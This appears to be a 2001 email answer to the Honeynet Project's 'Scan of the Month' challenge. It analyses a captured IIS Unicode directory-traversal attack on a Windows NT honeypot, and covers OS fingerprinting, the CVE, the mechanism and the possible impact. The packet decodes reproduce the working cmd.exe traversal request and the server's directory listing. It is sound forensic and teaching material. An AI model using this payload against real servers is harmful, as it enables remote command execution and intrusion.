From raul_siles@hp.com Mon Feb 19 09:23:50 2001 Date: Mon, 19 Feb 2001 16:09:34 +0100 From: "SILES,RAUL (HP-Spain,ex1)" To: "'project@honeynet.org'" , "SILES,RAUL (HP-Spain,ex1)" Subject: Scan of the Month - February (Scan 12) [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Hi, this are the results for the Scan number 12: february 2001. - http://project.honeynet.org/scans/scan12/ - Regards, Raśl Siles (Spain) ------------- # # SCAN OF THE MONTH #12: February, 2001 # # Challenge to see who can determine which tool was used # and the purpose of this attack. Packet decodes using snort # (http://www.snort.org). # # The packets were captured from the wild as part of the # Honeynet Project, http://project.honeynet.org QUESTIONS: ---------- Below is a specific probe/exploit ran against our honeypot, 172.16.1.106. As you read through these signatures, the challenge is to answer the following questions: ### QUESTION 1: What is the operating system of the honeypot, how do you know? It is running Windows NT: 1) You can know it reading the HTTP response sent from the Web Server: "Server: Microsoft-IIS/4.0" 2) Also, the way the sent packet was built can provide us some information: "/winnt/system32..." 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/..... 2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c: 3) Also, a fingerprintintg of the TCP handshake can show more information: (http://www.enteract.com/~lspitz/traces.txt) # OS VERSION PLATFORM TTL WINDOW DF TOS #--- ------- -------- --- ----------- -- --- Windows 9x/NT Intel 32 5000-9000 y 0 Windows 9x/NT Intel 128 5000-9000 y 0 <---- Windows 2000 Intel 128 17000-18000 y 0 - Win: 0x2238 = 5000 < 8760 < 9000 - DF = y - TTL: 127 = 127 - TOS: 0x0 = 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:00.872760 172.16.1.106:80 -> 128.173.37.135:1443 TCP TTL:127 TOS:0x0 ID:13343 IpLen:20 DgmLen:44 DF ***A**S* Seq: 0x1CB9F185 Ack: 0x2BDC107 Win: 0x2238 TcpLen: 24 TCP Options (1) => MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ ### QUESTION 2: What is the name of this attack? The hole, known as the IIS Unicode exploit, takes advantage of a vulnerability in some versions of Microsoft's Internet Information Server. "Exploitation of this vulnerability is trivial," security firm Internet Security Systems stated in an alert: (http://xforce.iss.net/alerts/advise68.php) <---- A lot of information about this exploit !!!! in October. Microsoft released a patch for the hole in August, but many customers are still vulnerable because system administrators haven't followed up. Apart from the hackings, the defaced HP, Compaq, AltaVista and Intel sites had another thing in common--the operating system in question was Windows NT and the Web server IIS/4.0. Microsoft was not immediately available for comment." - Microsoft IIS 4.0: http://www.microsoft.com/ntserver/nts/downloads/critical/q269862 - Microsoft IIS 5.0: http://www.microsoft.com/windows2000/downloads/critical/q269862 Possible formal name: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0884+ ### QUESTION 3: What is the attack attempting to accomplish? It is trying to execute a command in the remote system through the Web Server: In this example it is executing the Windows "dir" command. 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/..... 2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c: We can see that it is a successfull action due to the response obtained: Directory of c:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/20/00 05:13p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 12/20/00 05:14p WINNT 9 File(s) 78,643,522 bytes 1,779,191,808 bytes free ### QUESTION 4: How does the attack work? This vulnerability is a variation on the common 'dot dot' directory traversal attack. Older Web servers were vulnerable to this attack because affected Web servers read '..' directories in URLs and allowed attackers to back out of the web root directory. This technique allowed attackers to navigate the file system at will. IIS and most modern Web servers have incorporated security measures to prevent the 'dot dot' attack. These security measures deny all queries to URLs that contain too many leading slashes or '..' characters. The vulnerability described in this advisory bypasses these restrictions by simply substituting a standard '/' with a UNICODE translation of a '/' character or '\'. By appending the '..' and a UNICODE slash or backslash after a virtual directory with execute permissions, it is possible for an attacker to execute arbitrary commands. Attackers may execute any command via a specially crafted HTTP query. BONUS QUESTION: Is it possible to gain remote control of the system using this technqiue? If so, how? All queries are processed under the IUSR_machine context. This context is similar to a normal unprivileged account. However, this account is part of the 'Everyone' and 'Users' group, which allows it access to the web directory and most non-administrative functions. Attackers may not directly modify or delete files owned by the Administrator, nor run commands with privilege. BUT: Attackers may then have the ability to manipulate the appearance of the Web site, download sensitive customer data, or upload and install backdoor software. In this way, it could be possible to gain control of the remote system. SIGNATURES: ----------- ### Network Capture -*> Snort! <*- Version 1.7 By Martin Roesch (roesch@clark.net, www.snort.org) Exiting... lisa $more tmp.txt --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "snort-1226@0006.log" file. snaplen = 1514 --== Initialization Complete ==-- 12/26-07:06:00.871327 128.173.37.135:1443 -> 172.16.1.106:80 TCP TTL:13 TOS:0x40 ID:34723 IpLen:20 DgmLen:44 DF ******S* Seq: 0x2BDC106 Ack: 0x0 Win: 0x2000 TcpLen: 24 TCP Options (1) => MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:00.872760 172.16.1.106:80 -> 128.173.37.135:1443 TCP TTL:127 TOS:0x0 ID:13343 IpLen:20 DgmLen:44 DF ***A**S* Seq: 0x1CB9F185 Ack: 0x2BDC107 Win: 0x2238 TcpLen: 24 TCP Options (1) => MSS: 1460 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:01.109979 128.173.37.135:1443 -> 172.16.1.106:80 TCP TTL:13 TOS:0x40 ID:35235 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80 TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF ***AP*** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 20 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E GET /msadc/..... 2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F ./....../....../ 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 winnt/system32/c 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A md.exe?/c+dir+c: 5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 \ HTTP/1.1..Acce 70 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 pt: image/gif, i 6D 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 mage/x-xbitmap, 69 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 image/jpeg, imag 65 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 e/pjpeg, applica 74 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 tion/vnd.ms-exce 6C 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D l, application/m 73 77 6F 72 64 2C 20 61 70 70 6C 69 63 61 74 69 sword, applicati 6F 6E 2F 76 6E 64 2E 6D 73 2D 70 6F 77 65 72 70 on/vnd.ms-powerp 6F 69 6E 74 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 oint, */*..Accep 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 t-Language: en-u 73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 s..Accept-Encodi 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 ng: gzip, deflat 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D e..User-Agent: M 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 ozilla/4.0 (comp 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 atible; MSIE 5.0 31 3B 20 57 69 6E 64 6F 77 73 20 39 35 29 0D 0A 1; Windows 95).. 48 6F 73 74 3A 20 6C 61 62 2E 77 69 72 65 74 72 Host: lib.bvxttr 69 70 2E 6E 65 74 0D 0A 43 6F 6E 6E 65 63 74 69 ip.org..Connecti 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep-Alive.. 43 6F 6F 6B 69 65 3A 20 41 53 50 53 45 53 53 49 Cookie: ASPSESSI 4F 4E 49 44 47 51 51 51 51 51 5A 55 3D 4B 4E 4F ONIDGQQQQQZU=KNO 48 4D 4F 4A 41 4B 50 46 4F 50 48 4D 4C 41 50 4E HMOJAKPFOPHMLAPN 49 46 49 46 42 0D 0A 0D 0A 41 50 4E 49 46 49 46 IFIFB....APNIFIF 42 0D 0A 0D 0A B.... ### Session Breakout file ids# $more SESSION:1443-80 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Tue, 26 Dec 2000 13:05:30 GMT Connection: close Content-Type: application/octet-stream Volume in drive C has no label. Volume Serial Number is 8403-6A0E Directory of c:\ 11/26/00 12:34p 0 AUTOEXEC.BAT 11/26/00 06:57p 322 boot.ini 11/26/00 12:34p 0 CONFIG.SYS 12/07/00 03:30p InetPub 12/07/00 03:12p Multimedia Files 12/20/00 05:13p 78,643,200 pagefile.sys 12/21/00 08:59p Program Files 12/21/00 08:59p TEMP 12/20/00 05:14p WINNT 9 File(s) 78,643,522 bytes 1,779,191,808 bytes free ---------------------------------------------------------------------------